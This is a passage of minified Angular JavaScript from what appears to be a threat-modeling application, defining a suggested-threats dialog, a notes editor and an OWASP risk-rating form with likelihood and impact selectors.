10px;",4,"ngIf"],[1,"expansion-panel-headers-align",2,"pointer-events","initial"],[4,"ngFor","ngForOf"],["appearance","fill",1,"property-form-field"],["matInput","",3,"spellcheck","ngModel","ngModelChange"],["matSuffix","","mat-icon-button","","matTooltipShowDelay","1000",3,"matTooltip","click",4,"ngIf"],["matSuffix","","mat-icon-button","","matTooltipShowDelay","1000",3,"matTooltip","click"],["matTooltipShowDelay","1000",3,"value","matTooltip","selectionChange"],[3,"value",4,"ngFor","ngForOf"],[3,"value"],[3,"label"],["cdkDrag","","matTooltipShowDelay","1000",3,"matTooltip","click"],["mat-list-icon",""],["mat-line","",2,"pointer-events","initial"],["mat-icon-button","","matTooltipShowDelay","1000",2,"margin-left","auto",3,"matTooltip","click"],[2,"margin","10px 0 10px 10px"],[2,"margin-top","10px"],[2,"text-align","center"],["style","padding: 0 3px 0 3px;",4,"ngFor","ngForOf"],["style","text-align: center;",4,"ngFor","ngForOf"],[2,"padding","0 3px 0 3px"],["color","primary",3,"checked","change"],["matExpansionPanelContent",""],[3,"canEdit","attackVector"],[3,"canEdit","threatRule"]],template:function(e,i){1&e&&ne(0,kke,74,34,"div",0),2&e&&V("ngIf",i.control)},styles:['.column1[_ngcontent-%COMP%]{float:left;width:350px}.column2[_ngcontent-%COMP%]{float:left;width:calc(100% - 350px)}.row[_ngcontent-%COMP%]:after{content:"";display:table;clear:both}.prop-list[_ngcontent-%COMP%]   .mat-list-item[_ngcontent-%COMP%]{height:48px;cursor:pointer}.prop-list[_ngcontent-%COMP%]     .mat-list-item-content{padding:0 8px!important}.prop-list[_ngcontent-%COMP%]     .mat-list-text{padding-left:8px!important}.prop-list[_ngcontent-%COMP%]   .mat-subheader[_ngcontent-%COMP%]{display:contents}.prop-list-light[_ngcontent-%COMP%]{border-right:1px solid rgba(0,0,0,.1)}.prop-list-dark[_ngcontent-%COMP%]{border-right:1px solid rgba(255,255,255,.1)}.highlight-light[_ngcontent-%COMP%]{background-color:#0000001a}.highlight-dark[_ngcontent-%COMP%]{background-color:#ffffff1a}.property-form-field[_ngcontent-%COMP%]{width:300px}.reorder-list[_ngcontent-%COMP%]{max-width:100%;display:block;border-radius:4px;overflow:hidden}.reorder-box[_ngcontent-%COMP%]{padding:5px 10px;color:#000000de;display:flex;flex-direction:row;align-items:center;box-sizing:border-box;cursor:move;font-size:14px}.cdk-drag-preview[_ngcontent-%COMP%]{box-sizing:border-box;border-radius:4px;box-shadow:0 5px 5px -3px #0003,0 8px 10px 1px #00000024,0 3px 14px 2px #0000001f}.cdk-drag-placeholder[_ngcontent-%COMP%]{opacity:0}.cdk-drag-animating[_ngcontent-%COMP%]{transition:transform .25s cubic-bezier(0,0,.2,1)}.reorder-box[_ngcontent-%COMP%]:last-child{border:none}.reorder-list.cdk-drop-list-dragging[_ngcontent-%COMP%]   .reorder-box[_ngcontent-%COMP%]:not(.cdk-drag-placeholder){transition:transform .25s cubic-bezier(0,0,.2,1)}.disable[_ngcontent-%COMP%]{pointer-events:none}']}),t})();function Pke(t,a){1&t&&(m(0,"mat-icon"),s(1,"check_circle_outline"),u())}function Oke(t,a){if(1&t){const e=Ye();m(0,"tr"),s(1,"\n        "),m(2,"td"),s(3,"\n          "),ne(4,Pke,2,0,"mat-icon",4),s(5,"\n        "),u(),s(6,"\n        "),m(7,"td",5),s(8,"\n          "),m(9,"span",6),s(10),u(),it(11,"br"),s(12),u(),s(13,"\n        "),m(14,"td"),s(15,"\n          "),m(16,"button",7),he("click",function(){const r=be(e).$implicit;return Me(B(2).AddThreat(r))}),s(17),oe(18,"translate"),u(),s(19,"\n        "),u(),s(20,"\n      "),u()}if(2&t){const e=a.$implicit,i=B(2);C(4),V("ngIf",i.HasThreat(e)),C(6),ke(e.Name),C(2),ct("",e.Description,"\n        "),C(5),ke(re(18,4,"general.Add"))}}function Nke(t,a){if(1&t){const e=Ye();m(0,"button",8),he("click",function(){return be(e),Me(B(2).PrevStep())}),s(1,"Previous"),u()}}function Lke(t,a){if(1&t){const e=Ye();m(0,"button",8),he("click",function(){return be(e),Me(B(2).NextStep())}),s(1,"End"),u()}}function zke(t,a){if(1&t){const e=Ye();m(0,"button",8),he("click",function(){return be(e),Me(B(2).NextStep())}),s(1,"Next"),u()}}function Wke(t,a){if(1&t){const e=Ye();m(0,"mat-expansion-panel",1),he("opened",function(){const r=be(e).index;return Me(B().SetStep(r))}),s(1,"\n    "),m(2,"mat-expansion-panel-header"),s(3,"\n      "),m(4,"mat-panel-title"),s(5),u(),s(6,"\n    "),u(),s(7,"\n\n    "),m(8,"table"),s(9,"\n      "),ne(10,Oke,21,6,"tr",2),s(11,"\n    "),u(),s(12,"\n\n    "),m(13,"mat-action-row"),s(14,"\n      "),ne(15,Nke,2,0,"button",3),s(16,"\n      "),ne(17,Lke,2,0,"button",3),s(18,"\n      "),ne(19,zke,2,0,"button",3),s(20,"\n    "),u(),s(21,"\n  "),u()}if(2&t){const e=a.$implicit,i=a.index,n=a.first,r=a.last;V("expanded",B().step===i),C(5),za("\n        ",e[0].Name," (",e[1].length,")\n      "),C(5),V("ngForOf",e[1]),C(5),V("ngIf",!n),C(2),V("ngIf",r),C(2),V("ngIf",!r)}}let Fke=(()=>{class t{constructor(e,i,n){this.dataService=i,this.threatEngine=n,this.step=0,this.mnemonicArray=[],this.hasThreatBuffer={},this.element=e,this.dataService.Config.GetStencilThreatMnemonics().forEach(r=>{const c=r.Letters.filter(d=>{var T;return d.AffectedElementTypes.includes(null===(T=this.element.GetProperty("Type"))||void 0===T?void 0:T.ElementTypeID)});c.length>0&&this.mnemonicArray.push([r,c])})}ngOnInit(){}AddThreat(e){this.hasThreatBuffer[e.ID]=!0,this.threatEngine.AddMnemonicThreat(this.element,e).subscribe(i=>{i||(this.hasThreatBuffer[e.ID]=null)})}HasThreat(e){return null==this.hasThreatBuffer[e.ID]&&(this.hasThreatBuffer[e.ID]=this.dataService.Project.GetAttackScenarios().filter(i=>i.Target==this.element).filter(i=>i.ThreatMnemonicLetterID==e.ID).length>0),this.hasThreatBuffer[e.ID]}SetStep(e){this.step=e}NextStep(){this.step++}PrevStep(){this.step--}}return t.\u0275fac=function(e){return new(e||t)(Ee(lc,8),Ee(Yi),Ee(RT))},t.\u0275cmp=Wt({type:t,selectors:[["app-suggested-threats-dialog"]],decls:4,vars:1,consts:[[3,"expanded","opened",4,"ngFor","ngForOf"],[3,"expanded","opened"],[4,"ngFor","ngForOf"],["mat-button","",3,"click",4,"ngIf"],[4,"ngIf"],[2,"width","100%"],[2,"font-size","large"],["mat-raised-button","",3,"click"],["mat-button","",3,"click"]],template:function(e,i){1&e&&(m(0,"mat-accordion"),s(1,"\n  "),ne(2,Wke,22,7,"mat-expansion-panel",0),s(3,"\n"),u()),2&e&&(C(2),V("ngForOf",i.mnemonicArray))},dependencies:[Zi,Ri,oa,da,tl,Ec,E8,Dc,el,Xi]}),t})();const Vke=["newNote"],Bke=["ctxMenu"];function Hke(t,a){if(1&t){const e=Ye();m(0,"td")(1,"mat-checkbox",14),he("ngModelChange",function(n){return be(e),Me(B(2).$implicit.IsChecked=n)}),u()()}if(2&t){const e=B(2).$implicit;C(1),V("ngModel",e.IsChecked)}}function Uke(t,a){if(1&t&&(bt(0),s(1),Mt()),2&t){const e=B(3).$implicit;C(1),ct(" - ",e.Author,"")}}function qke(t,a){if(1&t&&(m(0,"td")(1,"span",15),s(2),oe(3,"localDateTime"),ne(4,Uke,2,1,"ng-container",11),s(5,": "),u()()),2&t){const e=B(2).$implicit;C(2),ke(re(3,2,e.Date)),C(2),V("ngIf",(null==e.Author?null:e.Author.length)>0)}}function Gke(t,a){if(1&t&&(m(0,"td")(1,"span",15),s(2),u()()),2&t){const e=B(2).index;C(2),ct("",e+1,". ")}}const VG=function(t){return{item:t}};function jke(t,a){if(1&t&&(m(0,"td"),s(1,"\n          "),m(2,"button",16),oe(3,"translate"),s(4,"\n            "),m(5,"mat-icon"),s(6,"more_vert"),u(),s(7,"\n          "),u(),s(8,"\n        "),u()),2&t){const e=B(2).$implicit;B();const i=Ti(15);C(2),at("matTooltip",re(3,3,"general.More")),V("matMenuTriggerFor",i)("matMenuTriggerData",fr(5,VG,e))}}function Qke(t,a){if(1&t){const e=Ye();m(0,"table"),s(1,"\n      "),m(2,"tr"),s(3,"\n        "),m(4,"td")(5,"mat-icon"),s(6,"arrow_right"),u()(),s(7,"\n        "),ne(8,Hke,2,1,"td",11),s(9,"\n        "),ne(10,qke,6,4,"td",11),s(11,"\n        "),ne(12,Gke,3,1,"td",11),s(13,"\n        "),m(14,"td"),s(15),u(),s(16,"\n        "),ne(17,jke,9,7,"td",11),s(18,"\n        "),m(19,"td"),s(20,"\n          "),m(21,"button",13),he("click",function(){be(e);const n=B().index;return Me(B().isEdtingArray[0][n]=!0)}),oe(22,"translate"),s(23,"\n            "),m(24,"mat-icon"),s(25,"edit"),u(),s(26,"\n          "),u(),s(27,"\n        "),u(),s(28,"\n        "),m(29,"td"),s(30,"\n          "),m(31,"button",13),he("click",function(){be(e);const n=B().$implicit;return Me(B().OnDeleteItem(n))}),oe(32,"translate"),s(33,"\n            "),m(34,"mat-icon"),s(35,"delete"),u(),s(36,"\n          "),u(),s(37,"\n        "),u(),s(38,"\n      "),u(),s(39,"\n    "),u()}if(2&t){const e=B().$implicit,i=B();C(8),V("ngIf",e.HasCheckbox),C(2),V("ngIf",e.ShowTimestamp),C(2),V("ngIf",i.enumerateItems),C(3),ke(e.Note),C(2),V("ngIf",i.canToggleCheckbox||i.canToggleTimestamp),C(4),at("matTooltip",re(22,7,"general.Edit")),C(10),at("matTooltip",re(32,9,"general.Delete"))}}function $ke(t,a){if(1&t){const e=Ye();m(0,"input",17),he("keydown",function(n){be(e);const r=B().index;return Me(B().OnRenameItem(n,0,r))})("focusout",function(n){be(e);const r=B().index;return Me(B().OnRenameItem(n,0,r))}),u()}if(2&t){const e=B().$implicit;V("spellcheck",B().dataService.HasSpellCheck)("ngModel",e.Note)}}function Kke(t,a){if(1&t){const e=Ye();m(0,"div",10),he("contextmenu",function(n){const r=be(e),c=r.$implicit,d=r.index;return Me(B().OpenContextMenu(n,c,d))}),s(1,"\n    "),ne(2,Qke,40,11,"table",11),s(3,"\n    "),ne(4,$ke,1,2,"input",12),s(5,"\n  "),u()}if(2&t){const e=a.index,i=B();ri("color",i.theme.IsDarkMode?"white":"black"),C(2),V("ngIf",!i.isEdtingArray[0][e]),C(2),V("ngIf",i.isEdtingArray[0][e])}}function Xke(t,a){if(1&t){const e=Ye();m(0,"button",19),s(1,"\n      "),m(2,"mat-slide-toggle",20),he("ngModelChange",function(n){return be(e),Me(B().item.HasCheckbox=n)})("click",function(n){return n.stopPropagation()}),s(3),oe(4,"translate"),u(),s(5,"\n    "),u()}if(2&t){const e=B().item;C(2),V("ngModel",e.HasCheckbox),C(1),ct("\n        ",re(4,2,"dialog.notes.hasCheckbox"),"\n      ")}}function Yke(t,a){if(1&t){const e=Ye();m(0,"button",19),s(1,"\n      "),m(2,"mat-slide-toggle",20),he("ngModelChange",function(n){return be(e),Me(B().item.ShowTimestamp=n)})("click",function(n){return n.stopPropagation()}),s(3),oe(4,"translate"),u(),s(5,"\n    "),u()}if(2&t){const e=B().item;C(2),V("ngModel",e.ShowTimestamp),C(1),ct("\n        ",re(4,2,"dialog.notes.showTimestamp"),"\n      ")}}function Jke(t,a){if(1&t&&(s(0,"\n    "),ne(1,Xke,6,4,"button",18),s(2,"\n    "),ne(3,Yke,6,4,"button",18),s(4,"\n  ")),2&t){const e=B();C(1),V("ngIf",e.canToggleCheckbox),C(2),V("ngIf",e.canToggleTimestamp)}}function Zke(t,a){if(1&t&&(m(0,"button",23),s(1,"\n        "),m(2,"mat-icon"),s(3,"more_vert"),u(),s(4,"\n        "),m(5,"span"),s(6),oe(7,"translate"),u(),s(8,"\n      "),u()),2&t){const e=B(2).item;B(),V("matMenuTriggerFor",Ti(15))("matMenuTriggerData",fr(5,VG,e)),C(6),ke(re(7,3,"general.More"))}}function e9e(t,a){if(1&t){const e=Ye();bt(0),s(1,"\n      "),ne(2,Zke,9,7,"button",21),s(3,"\n      "),m(4,"button",22),he("click",function(){be(e);const n=B().index;return Me(B().isEdtingArray[0][n]=!0)}),s(5,"\n        "),m(6,"mat-icon"),s(7,"edit"),u(),s(8,"\n        "),m(9,"span"),s(10),oe(11,"translate"),u(),s(12,"\n      "),u(),s(13,"\n      "),m(14,"button",22),he("click",function(){be(e);const n=B().item;return Me(B().OnDeleteItem(n))}),s(15,"\n        "),m(16,"mat-icon"),s(17,"delete"),u(),s(18,"\n        "),m(19,"span"),s(20),oe(21,"translate"),u(),s(22,"\n      "),u(),s(23,"\n    "),Mt()}if(2&t){const e=B(2);C(2),V("ngIf",e.canToggleCheckbox||e.canToggleTimestamp),C(8),ke(re(11,3,"general.Edit")),C(10),ke(re(21,5,"general.Delete"))}}function t9e(t,a){if(1&t&&(s(0,"\n    "),ne(1,e9e,24,7,"ng-container",11),s(2,"\n  ")),2&t){const e=a.item;C(1),V("ngIf",e)}}let Qp=(()=>{class t{constructor(e,i,n){this.theme=i,this.dataService=n,this.showTimestamp=!0,this.hasCheckbox=!1,this.canToggleCheckbox=!1,this.canToggleTimestamp=!1,this.enumerateItems=!1,this.isEdtingArray=[[],[]],this.menuTopLeftPosition={x:"0",y:"0"},e&&(this.showTimestamp=e.ShowTimestamp,this.hasCheckbox=e.HasCheckbox,this.canToggleCheckbox=e.CanToggleCheckbox,this.canToggleTimestamp=e.CanToggleTimestamp,this.notes=e.Notes)}get notes(){return this._notes}set notes(e){this.checkForUnsavedChanges(),this._notes=e,this._strings=null==e?void 0:e.map(i=>i.Note)}get strings(){return this._strings}set strings(e){this.checkForUnsavedChanges(),this._strings=e,this._notes=[],null==e||e.forEach(i=>{this._notes.push({Author:"",Date:"",ShowTimestamp:this.showTimestamp,HasCheckbox:this.hasCheckbox,IsChecked:!1,Note:i})})}ngOnInit(){}ngOnDestroy(){this.checkForUnsavedChanges()}OnDeleteItem(e){const i=this.notes.indexOf(e);i>=0&&(this.notes.splice(i,1),this.strings.splice(i,1))}OnRenameItem(e,i,n){("Enter"===e.key||"focusout"===e.type)&&(this.notes[n].Note=e.target.value,this.strings[n]=e.target.value,this.isEdtingArray[i][n]=!1)}OnKeyDown(e){"Enter"==e.key&&(this.addNote(e.target.value),e.target.value="")}OpenContextMenu(e,i,n){e.preventDefault(),this.menuTopLeftPosition.x=e.clientX+"px",this.menuTopLeftPosition.y=e.clientY+"px",this.matMenuTrigger.menuData={item:i,index:n},this.matMenuTrigger.openMenu()}drop(e){Qs(this.notes,e.previousIndex,e.currentIndex),Qs(this.strings,e.previousIndex,e.currentIndex)}addNote(e){this.notes.push({Date:Date.now().toString(),Author:this.dataService.UserDisplayName,Note:e,ShowTimestamp:this.showTimestamp,HasCheckbox:this.hasCheckbox,IsChecked:!1}),this.strings.push(e)}checkForUnsavedChanges(){var e,i;if((null===(i=null===(e=this.newNote)||void 0===e?void 0:e.nativeElement)||void 0===i?void 0:i.value.length)>0){const n=this.notes,r=this.strings,c=this.newNote.nativeElement.value;setTimeout(()=>{n.push({Date:Date.now().toString(),Author:this.dataService.UserDisplayName,Note:c,ShowTimestamp:this.showTimestamp,HasCheckbox:this.hasCheckbox,IsChecked:!1}),r.push(c)},10),this.newNote.nativeElement.value=null}}}return t.\u0275fac=function(e){return new(e||t)(Ee(S5,8),Ee(Oa),Ee(Yi))},t.\u0275cmp=Wt({type:t,selectors:[["app-notes"]],viewQuery:function(e,i){if(1&e&&(Mi(Vke,5),Mi(Bke,5)),2&e){let n;Vt(n=Bt())&&(i.newNote=n.first),Vt(n=Bt())&&(i.matMenuTrigger=n.first)}},inputs:{notes:"notes",strings:"strings",showTimestamp:"showTimestamp",hasCheckbox:"hasCheckbox",canToggleCheckbox:"canToggleCheckbox",canToggleTimestamp:"canToggleTimestamp",enumerateItems:"enumerateItems"},decls:29,vars:10,consts:[["cdkDropList","",1,"reorder-list",3,"cdkDropListDropped"],["class","reorder-box","cdkDrag","",3,"color","contextmenu",4,"ngFor","ngForOf"],[2,"padding","5px 10px"],["matInput","",2,"width","calc(100% - 24px)","vertical-align","super","font-size","14px",3,"spellcheck","placeholder","keydown"],["newNote",""],["moreMenu","matMenu"],["matMenuContent",""],[2,"visibility","hidden","position","fixed",3,"matMenuTriggerFor"],["ctxMenu","matMenuTrigger"],["rightMenu","matMenu"],["cdkDrag","",1,"reorder-box",3,"contextmenu"],[4,"ngIf"],["id","renameBox","type","text","style","width: -webkit-fill-available;","autofocus","","onfocus","this.select();",3,"spellcheck","ngModel","keydown","focusout",4,"ngIf"],["mat-icon-button","","matTooltipShowDelay","1000",2,"width","20px","height","20px","line-height","20px",3,"matTooltip","click"],["color","primary",2,"padding-right","5px",3,"ngModel","ngModelChange"],[2,"padding-right","5px"],["mat-icon-button","","matTooltipShowDelay","1000",2,"width","20px","height","20px","line-height","20px",3,"matMenuTriggerFor","matMenuTriggerData","matTooltip"],["id","renameBox","type","text","autofocus","","onfocus","this.select();",2,"width","-webkit-fill-available",3,"spellcheck","ngModel","keydown","focusout"],["mat-menu-item","",4,"ngIf"],["mat-menu-item",""],["color","primary",3,"ngModel","ngModelChange","click"],["mat-menu-item","",3,"matMenuTriggerFor","matMenuTriggerData",4,"ngIf"],["mat-menu-item","",3,"click"],["mat-menu-item","",3,"matMenuTriggerFor","matMenuTriggerData"]],template:function(e,i){if(1&e&&(m(0,"div",0),he("cdkDropListDropped",function(r){return i.drop(r)}),s(1,"\n  "),ne(2,Kke,6,4,"div",1),s(3,"\n"),u(),s(4,"\n"),m(5,"div",2),s(6,"\n  "),m(7,"mat-icon"),s(8,"arrow_right"),u(),m(9,"input",3,4),he("keydown",function(r){return i.OnKeyDown(r)}),oe(11,"translate"),u(),s(12,"\n"),u(),s(13,"\n"),m(14,"mat-menu",null,5),s(16,"\n  "),ne(17,Jke,5,2,"ng-template",6),s(18," \n"),u(),s(19,"\n"),it(20,"div",7,8),s(22," \n"),m(23,"mat-menu",null,9),s(25," \n  "),ne(26,t9e,3,1,"ng-template",6),s(27," \n"),u(),s(28," \n\n")),2&e){const n=Ti(24);C(2),V("ngForOf",i.notes),C(7),at("placeholder",re(11,8,"pages.modeling.charscope.addDescription")),V("spellcheck",i.dataService.HasSpellCheck),C(11),ri("left",i.menuTopLeftPosition.x)("top",i.menuTopLeftPosition.y),V("matMenuTriggerFor",n)}},dependencies:[Zi,Ri,an,Ta,Ea,Rd,Sd,oa,br,da,Xa,Xo,qo,po,Zc,Pa,vg,Xi,E5],styles:['.primary-color[_ngcontent-%COMP%]{color:#2196f3!important}.primary-background[_ngcontent-%COMP%]{background-color:#2196f3!important}.bg-color-light1[_ngcontent-%COMP%], .splitter-light2[_ngcontent-%COMP%]     .as-split-gutter, .splitter-light1[_ngcontent-%COMP%]     .as-split-gutter{background-color:#e7e5e5!important}.bg-color-light2[_ngcontent-%COMP%]{background-color:#f5f5f5!important}.bg-color-light3[_ngcontent-%COMP%]{background-color:#fff!important}.bg-color-dark1[_ngcontent-%COMP%], .splitter-dark2[_ngcontent-%COMP%]     .as-split-gutter, .splitter-dark1[_ngcontent-%COMP%]     .as-split-gutter{background-color:#333!important}.bg-color-dark2[_ngcontent-%COMP%]{background-color:#252525!important}.bg-color-dark3[_ngcontent-%COMP%]{background-color:#1e1e1e!important}.splitter[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter, .splitter-dark2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter, .splitter-light2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter, .splitter-dark1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter, .splitter-light1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter{position:relative}.splitter[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon, .splitter-dark2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon, .splitter-light2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon, .splitter-dark1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon, .splitter-light1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon{background-image:none!important;transition:opacity .3s;opacity:0;position:absolute}.splitter[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon:hover, .splitter-dark2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon:hover, .splitter-light2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon:hover, .splitter-dark1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon:hover, .splitter-light1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon:hover{opacity:1;background-color:#2196f3}.splitter[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter.as-dragged .as-split-gutter-icon, .splitter-dark2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter.as-dragged .as-split-gutter-icon, .splitter-light2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter.as-dragged .as-split-gutter-icon, .splitter-dark1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter.as-dragged .as-split-gutter-icon, .splitter-light1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter.as-dragged .as-split-gutter-icon{background-color:#2196f3;opacity:1}.column1[_ngcontent-%COMP%]{float:left;width:350px}.column2[_ngcontent-%COMP%]{float:left;width:calc(100% - 350px)}.row[_ngcontent-%COMP%]:after{content:"";display:table;clear:both}.prop-list[_ngcontent-%COMP%]   .mat-list-item[_ngcontent-%COMP%]{height:48px;cursor:pointer}.prop-list[_ngcontent-%COMP%]     .mat-list-item-content{padding:0 8px!important}.prop-list[_ngcontent-%COMP%]     .mat-list-text{padding-left:8px!important}.prop-list[_ngcontent-%COMP%]   .mat-subheader[_ngcontent-%COMP%]{display:contents}.prop-list-light[_ngcontent-%COMP%]{border-right:1px solid rgba(0,0,0,.1)}.prop-list-dark[_ngcontent-%COMP%]{border-right:1px solid rgba(255,255,255,.1)}.highlight-light[_ngcontent-%COMP%]{background-color:#0000001a}.highlight-dark[_ngcontent-%COMP%]{background-color:#ffffff1a}.property-form-field[_ngcontent-%COMP%]{width:300px}.reorder-list[_ngcontent-%COMP%]{max-width:100%;display:block;border-radius:4px;overflow:hidden}.reorder-box[_ngcontent-%COMP%]{padding:5px 10px;color:#000000de;display:flex;flex-direction:row;align-items:center;box-sizing:border-box;cursor:move;font-size:14px}.cdk-drag-preview[_ngcontent-%COMP%]{box-sizing:border-box;border-radius:4px;box-shadow:0 5px 5px -3px #0003,0 8px 10px 1px #00000024,0 3px 14px 2px #0000001f}.cdk-drag-placeholder[_ngcontent-%COMP%]{opacity:0}.cdk-drag-animating[_ngcontent-%COMP%]{transition:transform .25s cubic-bezier(0,0,.2,1)}.reorder-box[_ngcontent-%COMP%]:last-child{border:none}.reorder-list.cdk-drop-list-dragging[_ngcontent-%COMP%]   .reorder-box[_ngcontent-%COMP%]:not(.cdk-drag-placeholder){transition:transform .25s cubic-bezier(0,0,.2,1)}']}),t})();function i9e(t,a){if(1&t&&(m(0,"mat-option",10),s(1),oe(2,"translate"),u()),2&t){const e=a.$implicit;V("value",e),C(1),ke(re(2,2,"shared.owasprr.sl"+e.toString()))}}function a9e(t,a){if(1&t&&(m(0,"mat-option",10),s(1),oe(2,"translate"),u()),2&t){const e=a.$implicit;V("value",e),C(1),ke(re(2,2,"shared.owasprr.ed"+e.toString()))}}function n9e(t,a){if(1&t&&(m(0,"mat-option",10),s(1),oe(2,"translate"),u()),2&t){const e=a.$implicit;V("value",e),C(1),ke(re(2,2,"shared.owasprr.lc"+e.toString()))}}function o9e(t,a){if(1&t&&(m(0,"mat-option",10),s(1),oe(2,"translate"),u()),2&t){const e=a.$implicit;V("value",e),C(1),ke(re(2,2,"shared.owasprr.fd"+e.toString()))}}function r9e(t,a){if(1&t&&(m(0,"mat-option",10),s(1),oe(2,"translate"),u()),2&t){const e=a.$implicit;V("value",e),C(1),ke(re(2,2,"shared.owasprr.m"+e.toString()))}}function s9e(t,a){if(1&t&&(m(0,"mat-option",10),s(1),oe(2,"translate"),u()),2&t){const e=a.$implicit;V("value",e),C(1),ke(re(2,2,"shared.owasprr.ee"+e.toString()))}}function c9e(t,a){if(1&t&&(m(0,"mat-option",10),s(1),oe(2,"translate"),u()),2&t){const e=a.$implicit;V("value",e),C(1),ke(re(2,2,"shared.owasprr.li"+e.toString()))}}function l9e(t,a){if(1&t&&(m(0,"mat-option",10),s(1),oe(2,"translate"),u()),2&t){const e=a.$implicit;V("value",e),C(1),ke(re(2,2,"shared.owasprr.rd"+e.toString()))}}function d9e(t,a){if(1&t&&(m(0,"mat-option",10),s(1),oe(2,"translate"),u()),2&t){const e=a.$implicit;V("value",e),C(1),ke(re(2,2,"shared.owasprr.o"+e.toString()))}}function m9e(t,a){if(1&t&&(m(0,"mat-option",10),s(1),oe(2,"translate"),u()),2&t){const e=a.$implicit;V("value",e),C(1),ke(re(2,2,"shared.owasprr.a"+e.toString()))}}function u9e(t,a){if(1&t&&(m(0,"mat-option",10),s(1),oe(2,"translate"),u()),2&t){const e=a.$implicit;V("value",e),C(1),ke(re(2,2,"shared.owasprr.lav"+e.toString()))}}function h9e(t,a){if(1&t&&(m(0,"mat-option",10),s(1),oe(2,"translate"),u()),2&t){const e=a.$implicit;V("value",e),C(1),ke(re(2,2,"shared.owasprr.nc"+e.toString()))}}function f9e(t,a){if(1&t&&(m(0,"mat-option",10),s(1),oe(2,"translate"),u()),2&t){const e=a.$implicit;V("value",e),C(1),ke(re(2,2,"shared.owasprr.s"+e.toString()))}}function p9e(t,a){if(1&t&&(m(0,"mat-option",10),s(1),oe(2,"translate"),u()),2&t){const e=a.$implicit;V("value",e),C(1),ke(re(2,2,"shared.owasprr.id"+e.toString()))}}function _9e(t,a){if(1&t&&(m(0,"mat-option",10),s(1),oe(2,"translate"),u()),2&t){const e=a.$implicit;V("value",e),C(1),ke(re(2,2,"shared.owasprr.lac"+e.toString()))}}function g9e(t,a){if(1&t&&(m(0,"mat-option",10),s(1),oe(2,"translate"),u()),2&t){const e=a.$implicit;V("value",e),C(1),ke(re(2,2,"shared.owasprr.pv"+e.toString()))}}const C9e=function(){return[0,1,3,5,6,9]},BG=function(){return[0,1,3,7,9]},y9e=function(){return[0,2,6,7,9]},b9e=function(){return[0,1,4,9]},M9e=function(){return[0,1,5,9]},v9e=function(){return[0,1,3,5,7,9]},A9e=function(){return[0,1,4,5,9]},T9e=function(){return[0,4,7,9]},E9e=function(){return[0,1,4,6,9]},D9e=function(){return[0,1,5,7,9]},x9e=function(){return[0,2,5,7]},w9e=function(){return[0,2,4,5,6,9]},I9e=function(){return[0,1,3,8,9]},R9e=function(){return[0,1,7,9]},S9e=function(){return[0,3,5,7,9]};function k9e(t,a){if(1&t){const e=Ye();m(0,"table"),s(1,"\n  "),m(2,"tr"),s(3,"\n    "),m(4,"td",1)(5,"h2",2),s(6,"Likelihood Factors"),u()(),s(7,"\n    "),m(8,"td",1)(9,"h2",2),s(10,"Impact Factors"),u()(),s(11,"\n  "),u(),s(12,"\n  "),m(13,"tr"),s(14,"\n    "),m(15,"td",3)(16,"h3",2),s(17,"Threat Agent Factors"),u()(),s(18,"\n    "),m(19,"td",3)(20,"h3",2),s(21,"Vulnerability Factors"),u()(),s(22,"\n    "),m(23,"td",3)(24,"h3",2),s(25,"Technical Impact Factors"),u()(),s(26,"\n    "),m(27,"td",3)(28,"h3",2),s(29,"Business Impact Factors"),u()(),s(30,"\n  "),u(),s(31,"\n  "),m(32,"tr"),s(33,"\n    "),m(34,"td"),s(35,"\n      "),m(36,"mat-form-field",4),s(37,"\n        "),m(38,"mat-label"),s(39),oe(40,"translate"),u(),s(41,"\n        "),m(42,"mat-select",5),he("valueChange",function(n){return be(e),Me(B().entry.SL=n)}),s(43,"\n          "),ne(44,i9e,3,4,"mat-option",6),s(45,"\n        "),u(),s(46,"\n        "),m(47,"mat-icon",7),oe(48,"translate"),s(49,"info"),u(),s(50,"\n      "),u(),s(51,"\n    "),u(),s(52,"\n    "),m(53,"td"),s(54,"\n      "),m(55,"mat-form-field",4),s(56,"\n        "),m(57,"mat-label"),s(58),oe(59,"translate"),u(),s(60,"\n        "),m(61,"mat-select",5),he("valueChange",function(n){return be(e),Me(B().entry.ED=n)}),s(62,"\n          "),ne(63,a9e,3,4,"mat-option",6),s(64,"\n        "),u(),s(65,"\n        "),m(66,"mat-icon",7),oe(67,"translate"),s(68,"info"),u(),s(69,"\n      "),u(),s(70,"\n    "),u(),s(71,"\n    "),m(72,"td"),s(73,"\n      "),m(74,"mat-form-field",4),s(75,"\n        "),m(76,"mat-label"),s(77),oe(78,"translate"),u(),s(79,"\n        "),m(80,"mat-select",5),he("valueChange",function(n){return be(e),Me(B().entry.LC=n)}),s(81,"\n          "),ne(82,n9e,3,4,"mat-option",6),s(83,"\n        "),u(),s(84,"\n        "),m(85,"mat-icon",7),oe(86,"translate"),s(87,"info"),u(),s(88,"\n      "),u(),s(89,"\n    "),u(),s(90,"\n    "),m(91,"td"),s(92,"\n      "),m(93,"mat-form-field",4),s(94,"\n        "),m(95,"mat-label"),s(96),oe(97,"translate"),u(),s(98,"\n        "),m(99,"mat-select",5),he("valueChange",function(n){return 